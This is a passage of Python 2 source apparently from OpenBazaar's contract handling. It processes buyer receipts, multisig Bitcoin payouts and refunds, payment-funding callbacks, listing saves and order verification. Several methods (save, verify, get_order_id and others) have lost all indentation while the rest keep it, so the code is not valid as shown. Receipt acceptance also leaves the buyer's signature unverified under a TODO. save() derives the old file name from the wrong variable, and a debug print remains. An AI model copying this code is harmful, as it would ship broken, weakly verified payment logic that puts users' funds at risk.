            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["proof_of_tx"] = \
                base64.b64encode(self.db.purchases.get_proof_sig(order_id))
            if not anonymous:
                # reveal the buyer's identity inside the rating
                receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["buyer_guid"] = \
                    self.keychain.guid.encode("hex")
                receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["buyer_guid_key"] = \
                    self.keychain.verify_key.encode(encoder=nacl.encoding.HexEncoder)
        status = self.db.purchases.get_status(order_id)
        # status < 3 means payout not yet completed; only moderated (multisig) orders
        # need a payout transaction assembled here
        if status < 3 and "moderator" in self.contract["buyer_order"]["order"]:
            outpoints = json.loads(self.db.purchases.get_outpoint(order_id))
            payout_address = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["address"]
            redeem_script = str(self.contract["buyer_order"]["order"]["payment"]["redeem_script"])
            value = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["value"]
            tx = BitcoinTransaction.make_unsigned(outpoints, payout_address,
                                                  testnet=self.testnet, out_value=value)
            chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
            masterkey_b = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)
            buyer_priv = derive_childkey(masterkey_b, chaincode, bitcointools.MAINNET_PRIVATE)
            buyer_signatures = tx.create_signature(buyer_priv, redeem_script)
            # pair the buyer's signature with the vendor's for each input index
            signatures = []
            for i in range(len(outpoints)):
                for vendor_sig in self.contract["vendor_order_confirmation"]["invoice"]["payout"]["signature(s)"]:
                    if vendor_sig["index"] == i:
                        v_signature = vendor_sig["signature"]
                for buyer_sig in buyer_signatures:
                    if buyer_sig["index"] == i:
                        b_signature = buyer_sig["signature"]
                signature_obj = {"index": i, "signatures": [b_signature, v_signature]}
                signatures.append(signature_obj)
            receipt_json["buyer_receipt"]["receipt"]["payout"] = {}
            # complete the 2-of-3 multisig and broadcast the payout
            tx.multisign(signatures, redeem_script)
            tx.broadcast(self.blockchain)
            self.db.transactions.add_transaction(tx.to_raw_tx())
            self.log.info("broadcasting payout tx %s to network" % tx.get_hash())
            receipt_json["buyer_receipt"]["receipt"]["payout"]["txid"] = tx.get_hash()
            receipt_json["buyer_receipt"]["receipt"]["payout"]["signature(s)"] = buyer_signatures
            receipt_json["buyer_receipt"]["receipt"]["payout"]["value"] = tx.get_out_value()
        if claim:
            receipt_json["buyer_receipt"]["receipt"]["dispute"]["claim"] = claim
        # sign the receipt with the buyer's guid key (first 64 bytes = raw signature)
        receipt = json.dumps(receipt_json["buyer_receipt"]["receipt"], indent=4)
        receipt_json["buyer_receipt"]["signature"] = \
            base64.b64encode(self.keychain.signing_key.sign(receipt)[:64])
        self.contract["buyer_receipt"] = receipt_json["buyer_receipt"]
        if "rating" in self.contract["buyer_receipt"]["receipt"]:
            # sign the tx_summary with the derived bitcoin key so the rating is verifiable
            self.contract["buyer_receipt"]["receipt"]["rating"]["signature"] = \
                bitcointools.encode_sig(*bitcointools.ecdsa_raw_sign(json.dumps(
                    self.contract["buyer_receipt"]["receipt"]["rating"]["tx_summary"], indent=4), buyer_priv))
            if not anonymous:
                self.contract["buyer_receipt"]["receipt"]["rating"]["guid_signature"] = \
                    base64.b64encode(self.keychain.signing_key.sign(json.dumps(
                        self.contract["buyer_receipt"]["receipt"]["rating"]["tx_summary"], indent=4))[:64])
        if status < 3:
            # payout complete: mark complete and move the file out of "in progress"
            self.db.purchases.update_status(order_id, 3)
            file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", order_id + ".json")
            with open(file_path, 'w') as outfile:
                outfile.write(json.dumps(self.contract, indent=4))
            file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", order_id + ".json")
            if os.path.exists(file_path):
                os.remove(file_path)
        else:
            file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", order_id + ".json")
            # NOTE(review): opened 'wb' here but 'w' in the branch above — harmless on
            # Python 2, but verify the inconsistency is intentional.
            with open(file_path, 'wb') as outfile:
                outfile.write(json.dumps(self.contract, indent=4))
    def accept_receipt(self, notification_listener, blockchain, receipt_json=None):
        """
        Process the final receipt sent over by the buyer. If valid, broadcast the transaction
        to the bitcoin network.

        Args:
            notification_listener: used to push a "rating received" notification.
            blockchain: libbitcoin client used to broadcast the payout transaction.
            receipt_json: serialized buyer_receipt section; when given it is parsed
                and attached to self.contract before validation.

        Returns: the order id on success.
        Raises: Exception when a receipt was already processed, the reference hash
            doesn't match, or the order status doesn't allow a receipt yet.
        Side effects: updates sale status, stores rating and payment tx in the db,
        and moves the contract file from "in progress" to "trade receipts".
        """
        self.notification_listener = notification_listener
        self.blockchain = blockchain
        # a contract may only be receipted once
        if "buyer_receipt" in self.contract:
            raise Exception("A receipt has already been processed for this order")
        if receipt_json:
            self.contract["buyer_receipt"] = json.loads(receipt_json,
                                                        object_pairs_hook=OrderedDict)
        # recompute the contract hash over everything except the receipt and any
        # dispute sections; it must equal the ref_hash the buyer signed
        contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
        del contract_dict["buyer_receipt"]
        if "dispute" in contract_dict:
            del contract_dict["dispute"]
        if "dispute_resolution" in contract_dict:
            del contract_dict["dispute_resolution"]
        contract_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
        ref_hash = self.contract["buyer_receipt"]["receipt"]["ref_hash"]
        if ref_hash != contract_hash:
            raise Exception("Order number doesn't match")
        # TODO: verify buyer signature
        if "vendor_order_confirmation" in self.contract:
            order_id = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
        else:
            order_id = self.get_order_id()
        status = self.db.sales.get_status(order_id)
        # 2 = confirmed, 5/6 = dispute finalized states
        if status not in (2, 5, 6):
            raise Exception("Can only process a receipt after an order confirmation "
                            "is sent or a dispute is finalized")
        title = self.contract["vendor_offer"]["listing"]["item"]["title"]
        if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
            image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
        else:
            image_hash = ""
        buyer_guid = unhexlify(self.contract["buyer_order"]["order"]["id"]["guid"])
        if "blockchain_id" in self.contract["buyer_order"]["order"]["id"]:
            handle = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
        else:
            handle = ""
        # moderated orders not already settled by a dispute need the payout broadcast
        if "moderator" in self.contract["buyer_order"]["order"] and status not in (5, 6):
            outpoints = json.loads(self.db.sales.get_outpoint(order_id))
            payout_address = str(self.contract["vendor_order_confirmation"]["invoice"]["payout"]["address"])
            redeem_script = str(self.contract["buyer_order"]["order"]["payment"]["redeem_script"])
            value = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["value"]
            tx = BitcoinTransaction.make_unsigned(outpoints, payout_address,
                                                  testnet=self.testnet, out_value=value)
            vendor_sigs = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["signature(s)"]
            buyer_sigs = self.contract["buyer_receipt"]["receipt"]["payout"]["signature(s)"]
            # pair buyer and vendor signatures per input index for the 2-of-3 multisig
            signatures = []
            for i in range(len(outpoints)):
                for vendor_sig in vendor_sigs:
                    if vendor_sig["index"] == i:
                        v_signature = vendor_sig["signature"]
                for buyer_sig in buyer_sigs:
                    if buyer_sig["index"] == i:
                        b_signature = buyer_sig["signature"]
                signature_obj = {"index": i, "signatures": [b_signature, v_signature]}
                signatures.append(signature_obj)
            tx.multisign(signatures, redeem_script)
            tx.broadcast(self.blockchain)
            self.db.transactions.add_transaction(tx.to_raw_tx())
            self.log.info("broadcasting payout tx %s to network" % tx.get_hash())
            self.db.sales.update_payment_tx(order_id, tx.get_hash())
        # notify the vendor (websocket + email) that a rating arrived
        self.notification_listener.notify(buyer_guid, handle, "rating received", order_id, title, image_hash)
        notification_rater = handle if handle else buyer_guid.encode('hex')
        notification = SMTPNotification(self.db)
        notification.send("[OpenBazaar] New Rating Received",
                          "You received a new rating from %s for Order #%s - \"%s\". " % (notification_rater,
                                                                                          order_id,
                                                                                          title))
        if "rating" in self.contract["buyer_receipt"]["receipt"]:
            self.db.ratings.add_rating(self.contract["buyer_receipt"]["receipt"]
                                       ["rating"]["tx_summary"]["listing"],
                                       json.dumps(self.contract["buyer_receipt"]["receipt"]["rating"], indent=4))
        if status == 2:
            self.db.sales.status_changed(order_id, 1)
        # 3 = complete; move the contract file into "trade receipts"
        self.db.sales.update_status(order_id, 3)
        file_path = os.path.join(DATA_FOLDER, "store", "contracts", "trade receipts", order_id + ".json")
        with open(file_path, 'w') as outfile:
            outfile.write(json.dumps(self.contract, indent=4))
        file_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", order_id + ".json")
        if os.path.exists(file_path):
            os.remove(file_path)
        return order_id
    def await_funding(self, notification_listener, libbitcoin_client, proofSig, is_purchase=True):
        """
        Saves the contract to the file system and db as an unfunded contract.
        Listens on the libbitcoin server for the multisig address to be funded.

        Args:
            notification_listener: stored for later use by on_tx_received/payment_received.
            libbitcoin_client: blockchain client used to subscribe to the payment address.
            proofSig: proof-of-order signature stored with a purchase row.
            is_purchase: True when we are the buyer (purchases tables/folders),
                False when we are the vendor (sales tables/folders).
        """
        self.notification_listener = notification_listener
        self.blockchain = libbitcoin_client
        self.is_purchase = is_purchase
        # order id = hex digest of the full serialized contract at this point
        order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
        payment_address = self.contract["buyer_order"]["order"]["payment"]["address"]
        vendor_item = self.contract["vendor_offer"]["listing"]["item"]
        if "image_hashes" in vendor_item:
            thumbnail_hash = vendor_item["image_hashes"][0]
        else:
            thumbnail_hash = ""
        # prefer the human-readable blockchain handle when one is set, else the guid
        if "blockchain_id" in self.contract["vendor_offer"]["listing"]["id"] \
                and self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"] != "":
            vendor = self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"]
        else:
            vendor = self.contract["vendor_offer"]["listing"]["id"]["guid"]
        if "blockchain_id" in self.contract["buyer_order"]["order"]["id"] \
                and self.contract["buyer_order"]["order"]["id"]["blockchain_id"] != "":
            buyer = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
        else:
            buyer = self.contract["buyer_order"]["order"]["id"]["guid"]
        if is_purchase:
            # buyer side: record the purchase with status 0 (unfunded)
            file_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", order_id + ".json")
            self.db.purchases.new_purchase(order_id,
                                           self.contract["vendor_offer"]["listing"]["item"]["title"],
                                           self.contract["vendor_offer"]["listing"]["item"]["description"],
                                           time.time(),
                                           self.contract["buyer_order"]["order"]["payment"]["amount"],
                                           payment_address,
                                           0,
                                           thumbnail_hash,
                                           vendor,
                                           proofSig,
                                           self.contract["vendor_offer"]["listing"]["metadata"]["category"])
        else:
            # vendor side: record the sale with status 0 (unfunded) and email the vendor
            file_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", order_id + ".json")
            title = self.contract["vendor_offer"]["listing"]["item"]["title"]
            description = self.contract["vendor_offer"]["listing"]["item"]["description"]
            self.db.sales.new_sale(order_id,
                                   title,
                                   description,
                                   time.time(),
                                   self.contract["buyer_order"]["order"]["payment"]["amount"],
                                   payment_address,
                                   0,
                                   thumbnail_hash,
                                   buyer,
                                   self.contract["vendor_offer"]["listing"]["metadata"]["category"])
            # email failures must not abort order processing; best-effort only
            try:
                notification = SMTPNotification(self.db)
                notification.send("[OpenBazaar] Order Received", "Order #%s<br>"
                                                                 "Buyer: %s<br>"
                                                                 "BTC Address: %s<br>"
                                                                 "Title: %s<br>"
                                                                 "Description: %s<br>"
                                  % (order_id, buyer, payment_address, title, description))
            except Exception as e:
                self.log.info("Error with SMTP notification: %s" % e.message)
        with open(file_path, 'w') as outfile:
            outfile.write(json.dumps(self.contract, indent=4))
        # on_tx_received fires whenever the payment address sees a transaction
        self.blockchain.subscribe_address(str(payment_address), notification_cb=self.on_tx_received)
    def on_tx_received(self, address_version, address_hash, height, block_hash, tx):
        """
        Fire when the libbitcoin server tells us we received a payment to this funding address.
        While unlikely, a user may send multiple transactions to the funding address to reach the
        funding level. We need to keep a running balance and increment it when a new transaction
        is received. If the contract is fully funded, we push a notification to the websockets.

        Args (supplied by the libbitcoin subscription callback):
            address_version, address_hash: identify the watched address (unused here).
            height, block_hash: block context of the tx (unused here).
            tx: the serialized transaction.
        """
        try:
            # decode the transaction
            self.log.info("Bitcoin transaction detected")
            transaction = BitcoinTransaction.from_serialized(tx, self.testnet)
            # get the amount (in satoshi) the user is expected to pay
            amount_to_pay = int(float(self.contract["buyer_order"]["order"]["payment"]["amount"]) * 100000000)
            if tx not in self.received_txs:  # make sure we aren't parsing the same tx twice.
                outpoints = transaction.check_for_funding(
                    self.contract["buyer_order"]["order"]["payment"]["address"])
                if outpoints is not None:
                    for outpoint in outpoints:
                        self.amount_funded += outpoint["value"]
                        # NOTE(review): tx is appended once per outpoint, so received_txs
                        # can hold duplicates; the membership guard above still works.
                        self.received_txs.append(tx)
                        self.outpoints.append(outpoint)
                if self.amount_funded >= amount_to_pay:  # if fully funded
                    self.payment_received()
                else:
                    # partially funded: tell the UI how much has arrived so far (in BTC)
                    order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
                    notification_json = {
                        "notification": {
                            "type": "partial payment",
                            "amount_funded": round(self.amount_funded / float(100000000), 8),
                            "order_id": order_id
                        }
                    }
                    self.notification_listener.push_ws(notification_json)
        except Exception as e:
            # callback context: never let an exception escape into the subscription loop
            self.log.critical("Error processing bitcoin transaction: %s" % e.message)
    def payment_received(self):
        """
        Handle a fully funded order: stop watching the payment address, bump the
        order status to 1 (funded), persist the funding outpoints, notify the
        counterparty (websocket + email), and move the contract file from
        "unfunded" to "in progress".
        """
        self.blockchain.unsubscribe_address(
            self.contract["buyer_order"]["order"]["payment"]["address"], self.on_tx_received)
        order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
        title = self.contract["vendor_offer"]["listing"]["item"]["title"]
        if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
            image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
        else:
            image_hash = ""
        if self.is_purchase:
            # buyer side: our own payment to the vendor completed
            unfunded_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", order_id + ".json")
            in_progress_path = os.path.join(DATA_FOLDER, "purchases", "in progress", order_id + ".json")
            if "blockchain_id" in self.contract["vendor_offer"]["listing"]["id"]:
                handle = self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"]
            else:
                handle = ""
            vendor_guid = self.contract["vendor_offer"]["listing"]["id"]["guid"]
            self.notification_listener.notify(unhexlify(vendor_guid), handle, "payment received",
                                              order_id, title, image_hash)
            notification = SMTPNotification(self.db)
            notification.send("[OpenBazaar] Purchase Payment Received", "Your payment was received.<br><br>"
                                                                        "Order: %s<br>"
                                                                        "Vendor: %s<br>"
                                                                        "Title: %s"
                              % (order_id, vendor_guid, title))
            # update the db (only move 0 -> 1; don't regress a more advanced status)
            if self.db.purchases.get_status(order_id) == 0:
                self.db.purchases.update_status(order_id, 1)
            self.db.purchases.update_outpoint(order_id, json.dumps(self.outpoints))
            self.log.info("Payment for order id %s successfully broadcast to network." % order_id)
        else:
            # vendor side: a buyer funded a new order
            unfunded_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", order_id + ".json")
            in_progress_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", order_id + ".json")
            buyer_guid = self.contract["buyer_order"]["order"]["id"]["guid"]
            if "blockchain_id" in self.contract["buyer_order"]["order"]["id"]:
                handle = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
            else:
                handle = ""
            self.notification_listener.notify(unhexlify(buyer_guid), handle, "new order", order_id,
                                              title, image_hash)
            notification = SMTPNotification(self.db)
            notification.send("[OpenBazaar] Payment for Order Received", "Payment was received for Order #%s."
                              % order_id)
            self.db.sales.update_status(order_id, 1)
            self.db.sales.status_changed(order_id, 1)
            self.db.sales.update_outpoint(order_id, json.dumps(self.outpoints))
            self.log.info("Received new order %s" % order_id)
        # move the contract file out of the unfunded folder
        os.rename(unfunded_path, in_progress_path)
def get_contract_id(self):
return self.contract["vendor_offer"]["listing"]["contract_id"]
def get_order_id(self):
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
if "vendor_order_confirmation" in contract_dict:
del contract_dict["vendor_order_confirmation"]
if "buyer_receipt" in contract_dict:
del contract_dict["buyer_receipt"]
if "dispute" in contract_dict:
del contract_dict["dispute"]
if "dispute_resolution" in contract_dict:
del contract_dict["dispute_resolution"]
return digest(json.dumps(contract_dict, indent=4)).encode("hex")
def check_expired(self):
expiry = self.contract["vendor_offer"]["listing"]["metadata"]["expiry"]
if expiry == "never":
return False
elif datetime.strptime(expiry[:len(expiry)-4], '%Y-%m-%dT%H:%M') < datetime.utcnow():
return True
else:
return False
    def delete(self, delete_images=False):
        """
        Deletes the contract json from the OpenBazaar directory as well as the listing
        metadata from the db and all the related images in the file system.

        Args:
            delete_images: when True, also remove the listing's image files from
                disk and their filemap entries.
        """
        # get the file path
        file_path = self.db.filemap.get_file(self.contract["vendor_offer"]["listing"]["contract_id"])
        # maybe delete the images from disk
        if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"] and delete_images:
            for image_hash in self.contract["vendor_offer"]["listing"]["item"]["image_hashes"]:
                # delete from disk
                image_path = self.db.filemap.get_file(image_hash)
                if os.path.exists(image_path):
                    os.remove(image_path)
                # remove pointer to the image from the filemap
                self.db.filemap.delete(image_hash)
        # delete the contract from disk
        if os.path.exists(file_path):
            os.remove(file_path)
        # delete the listing metadata from the db
        contract_hash = unhexlify(self.contract["vendor_offer"]["listing"]["contract_id"])
        self.db.listings.delete_listing(contract_hash)
        # remove the pointer to the contract from the filemap
        self.db.filemap.delete(contract_hash.encode("hex"))
def save(self):
"""
Saves the json contract into the OpenBazaar/store/listings/contracts/ directory.
It uses the title as the file name so it's easy on human eyes. A mapping of the
hash of the contract and file path is stored in the database so we can retrieve
the contract with only its hash.
Additionally, the contract metadata (sent in response to the GET_LISTINGS query)
is saved in the db for fast access.
"""
# get the contract title to use as the file name and format it
file_name = str(self.contract["vendor_offer"]["listing"]["item"]["title"][:100])
file_name = re.sub(r"[^\w\s]", '', file_name)
file_name = re.sub(r"\s+", '_', file_name)
file_name += str(self.contract["vendor_offer"]["listing"]["contract_id"])[:8]
# save the json contract to the file system
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "listings", file_name + ".json")
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
if self.previous_title and self.previous_title != self.contract["vendor_offer"]["listing"]["item"]["title"]:
if isinstance(self.previous_title, unicode):
self.previous_title = self.previous_title.encode('utf8')
old_name = str(self.previous_title[:100])
old_name = re.sub(r"[^\w\s]", '', file_name)
old_name = re.sub(r"\s+", '_', file_name)
old_name += str(self.contract["vendor_offer"]["listing"]["contract_id"])[:8]
old_path = os.path.join(DATA_FOLDER, "store", "contracts", "listings", old_name + ".json")
if os.path.exists(old_path):
os.remove(old_path)
# Create a `ListingMetadata` protobuf object using data from the full contract
listings = Listings()
data = listings.ListingMetadata()
data.contract_hash = unhexlify(self.contract["vendor_offer"]["listing"]["contract_id"])
vendor_item = self.contract["vendor_offer"]["listing"]["item"]
data.title = vendor_item["title"]
if "image_hashes" in vendor_item:
data.thumbnail_hash = unhexlify(vendor_item["image_hashes"][0])
if "category" in vendor_item:
data.category = vendor_item["category"]
if "bitcoin" not in vendor_item["price_per_unit"]:
data.price = float(vendor_item["price_per_unit"]["fiat"]["price"])
data.currency_code = vendor_item["price_per_unit"]["fiat"][
"currency_code"]
else:
data.price = round(float(vendor_item["price_per_unit"]["bitcoin"]), 8)
data.currency_code = "BTC"
data.nsfw = vendor_item["nsfw"]
if "shipping" not in self.contract["vendor_offer"]["listing"]:
data.origin = CountryCode.Value("NA")
else:
data.origin = CountryCode.Value(
self.contract["vendor_offer"]["listing"]["shipping"]["shipping_origin"].upper())
for region in self.contract["vendor_offer"]["listing"]["shipping"]["shipping_regions"]:
data.ships_to.append(CountryCode.Value(region.upper()))
if self.contract["vendor_offer"]["listing"]["metadata"]["category"].lower() == "physical good":
data.contract_type = listings.PHYSICAL_GOOD
elif self.contract["vendor_offer"]["listing"]["metadata"]["category"].lower() == "digital good":
data.contract_type = listings.DIGITAL_GOOD
elif self.contract["vendor_offer"]["listing"]["metadata"]["category"].lower() == "service":
data.contract_type = listings.SERVICE
data.last_modified = int(time.time())
# save the mapping of the contract file path and contract hash in the database
self.db.filemap.insert(data.contract_hash.encode("hex"), file_path[len(DATA_FOLDER):])
# save the `ListingMetadata` protobuf to the database as well
self.db.listings.add_listing(data)
    def process_refund(self, refund_json, blockchain, notification_listener):
        """
        Process a refund message from the vendor.

        For moderated (multisig) orders the refund arrives as partial signatures
        ("txid" absent): we co-sign with our key, assemble the 2-of-3 multisig
        refund transaction, and broadcast it. For direct payments the vendor has
        already broadcast the refund and only notifies us.

        Args:
            refund_json: parsed refund section; attached to self.contract.
            blockchain: libbitcoin client used to broadcast the refund tx.
            notification_listener: used to push a "refund" notification.

        Raises: Exception if a refund was already processed for this order.
        Side effects: updates purchase status to 7 (refunded) and moves the
        contract file from "in progress" to "trade receipts".
        """
        if "refund" in self.contract:
            raise Exception("Refund already processed for this order")
        self.contract["refund"] = refund_json["refund"]
        order_id = refund_json["refund"]["order_id"]
        # no txid means the vendor only sent his signatures; we must finish the multisig
        if "txid" not in refund_json["refund"]:
            outpoints = json.loads(self.db.purchases.get_outpoint(order_id))
            refund_address = self.contract["buyer_order"]["order"]["refund_address"]
            redeem_script = self.contract["buyer_order"]["order"]["payment"]["redeem_script"]
            # refund value = total funded minus the agreed refund tx fee
            in_value = 0
            for outpoint in outpoints:
                in_value += outpoint["value"]
            out_value = in_value - long(self.contract["buyer_order"]["order"]["payment"]["refund_tx_fee"])
            tx = BitcoinTransaction.make_unsigned(outpoints, refund_address,
                                                  testnet=self.testnet,
                                                  out_value=out_value)
            # derive our (buyer) child private key for this order and sign
            chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
            masterkey_b = bitcointools.bip32_extract_key(KeyChain(self.db).bitcoin_master_privkey)
            buyer_priv = derive_childkey(masterkey_b, chaincode, bitcointools.MAINNET_PRIVATE)
            buyer_sigs = tx.create_signature(buyer_priv, redeem_script)
            vendor_sigs = refund_json["refund"]["signature(s)"]
            # pair buyer and vendor signatures per input index
            signatures = []
            for i in range(len(outpoints)):
                for vendor_sig in vendor_sigs:
                    if vendor_sig["index"] == i:
                        v_signature = vendor_sig["signature"]
                for buyer_sig in buyer_sigs:
                    if buyer_sig["index"] == i:
                        b_signature = buyer_sig["signature"]
                signature_obj = {"index": i, "signatures": [b_signature, v_signature]}
                signatures.append(signature_obj)
            tx.multisign(signatures, redeem_script)
            tx.broadcast(blockchain)
            self.db.transactions.add_transaction(tx.to_raw_tx())
            self.log.info("broadcasting refund tx %s to network" % tx.get_hash())
        # 7 = refunded
        self.db.purchases.update_status(order_id, 7)
        self.db.purchases.status_changed(order_id, 1)
        file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", order_id + ".json")
        with open(file_path, 'w') as outfile:
            outfile.write(json.dumps(self.contract, indent=4))
        file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", order_id + ".json")
        if os.path.exists(file_path):
            os.remove(file_path)
        title = self.contract["vendor_offer"]["listing"]["item"]["title"]
        if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
            image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
        else:
            image_hash = ""
        buyer_guid = self.contract["buyer_order"]["order"]["id"]["guid"]
        if "blockchain_id" in self.contract["buyer_order"]["order"]["id"]:
            handle = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
        else:
            handle = ""
        # notify the buyer (websocket + email) that the refund arrived
        notification_listener.notify(buyer_guid, handle, "refund", order_id, title, image_hash)
        notification = SMTPNotification(self.db)
        notification.send("[OpenBazaar] Refund Received", "You received a refund.<br><br>"
                                                          "Order: %s<br>Title: %s"
                          % (order_id, title))
def verify(self, sender_key):
"""
Validate that an order sent over by a buyer is filled out correctly.
"""
SelectParams("testnet" if self.testnet else "mainnet")
try:
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
del contract_dict["buyer_order"]
contract_hash = digest(json.dumps(contract_dict, indent=4))
ref_hash = unhexlify(self.contract["buyer_order"]["order"]["ref_hash"])
contract_id = self.contract["vendor_offer"]["listing"]["contract_id"]
# verify that the reference hash matches the contract and that the contract actually exists
if contract_hash != ref_hash or not self.db.filemap.get_file(contract_id):
raise Exception("Order for contract that doesn't exist")
# verify the vendor's own signature
verify_key = self.keychain.signing_key.verify_key
verify_key.verify(json.dumps(self.contract["vendor_offer"]["listing"], indent=4),
base64.b64decode(self.contract["vendor_offer"]["signatures"]["guid"]))
# verify timestamp is within a reasonable time from now
timestamp = self.contract["buyer_order"]["order"]["date"]
dt = datetime.strptime(timestamp[:len(timestamp)-4], "%Y-%m-%d %H:%M:%S.%f")
if abs((datetime.utcnow() - dt).total_seconds()) > 600:
raise Exception("Timestamp on order not within 10 minutes of now")
# verify the signatures on the order
verify_obj = json.dumps(self.contract["buyer_order"]["order"], indent=4)
verify_key = nacl.signing.VerifyKey(sender_key)
verify_key.verify(verify_obj, base64.b64decode(self.contract["buyer_order"]["signatures"]["guid"]))
bitcoin_key = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
bitcoin_sig = self.contract["buyer_order"]["signatures"]["bitcoin"]
valid = bitcointools.ecdsa_raw_verify(verify_obj, bitcointools.decode_sig(bitcoin_sig), bitcoin_key)
if not valid:
raise Exception("Invalid Bitcoin signature")
# verify buyer included the correct bitcoin amount for payment
quantity = int(self.contract["buyer_order"]["order"]["quantity"])
price_json = self.contract["vendor_offer"]["listing"]["item"]["price_per_unit"]
if "bitcoin" in price_json:
asking_price = float(price_json["bitcoin"]) * quantity
else:
currency_code = price_json["fiat"]["currency_code"]
fiat_price = price_json["fiat"]["price"]
conversion_rate = BtcPrice.instance().get(currency_code.upper())
asking_price = float("{0:.8f}".format(float(fiat_price) / float(conversion_rate))) * quantity
if "shipping" in self.contract["vendor_offer"]["listing"]:
if not self.contract["vendor_offer"]["listing"]["shipping"]["free"]:
shipping_origin = self.contract["vendor_offer"]["listing"]["shipping"][
"shipping_origin"].upper()
if shipping_origin == self.contract["buyer_order"]["order"]["shipping"]["country"].upper():
if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
shipping_amount = float(self.contract["vendor_offer"]["listing"]["shipping"][
"flat_fee"]["bitcoin"]["domestic"]) * quantity
else:
price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
"price"]["domestic"]
currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
"fiat"]["currency_code"]
conversion_rate = BtcPrice.instance().get(currency.upper(), False)
shipping_amount = float("{0:.8f}".format(float(price) /
float(conversion_rate))) * quantity
else:
if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
shipping_amount = float(self.contract["vendor_offer"]["listing"]["shipping"][
"flat_fee"]["bitcoin"]["international"]) * quantity
else:
price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
"price"]["international"]
currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
"fiat"]["currency_code"]
conversion_rate = BtcPrice.instance().get(currency.upper(), False)
shipping_amount = float("{0:.8f}".format(float(price) /
float(conversion_rate))) * quantity
asking_price += shipping_amount
print round(float(asking_price), 8), float(self.contract["buyer_order"]["order"]["payment"]["amount"])
if round(float(asking_price), 8) > float(self.contract["buyer_order"]["order"]["payment"]["amount"]):
raise Exception("Insuffient Payment")
if "moderator" in self.contract["buyer_order"]["order"]:
# verify a valid moderator was selected
valid_mod = False
for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
if mod["guid"] == self.contract["buyer_order"]["order"]["moderator"]:
valid_mod = True
if not valid_mod:
raise Exception("Invalid moderator")
# verify redeem script
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
if mod["guid"] == self.contract["buyer_order"]["order"]["moderator"]:
masterkey_m = mod["pubkeys"]["bitcoin"]["key"]
masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
buyer_key = unhexlify(derive_childkey(masterkey_b, chaincode))
vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
moderator_key = unhexlify(derive_childkey(masterkey_m, chaincode))
redeem_script = CScript([OP_2, buyer_key, vendor_key, moderator_key, OP_3, OP_CHECKMULTISIG])
if redeem_script.encode("hex") != self.contract["buyer_order"]["order"]["payment"]["redeem_script"]:
raise Exception("Invalid redeem script")
# verify the multisig payment address
payment_address = str(P2SHBitcoinAddress.from_redeemScript(redeem_script))
if payment_address != self.contract["buyer_order"]["order"]["payment"]["address"]:
raise Exception("Incorrect payment address")
else:
# verify the direct payment address
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
# verify the payment address
payment_address = str(P2PKHBitcoinAddress.from_pubkey(vendor_key))
if payment_address != self.contract["buyer_order"]["order"]["payment"]["address"]:
raise Exception("Incorrect payment address")
# verify all the shipping fields exist
if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
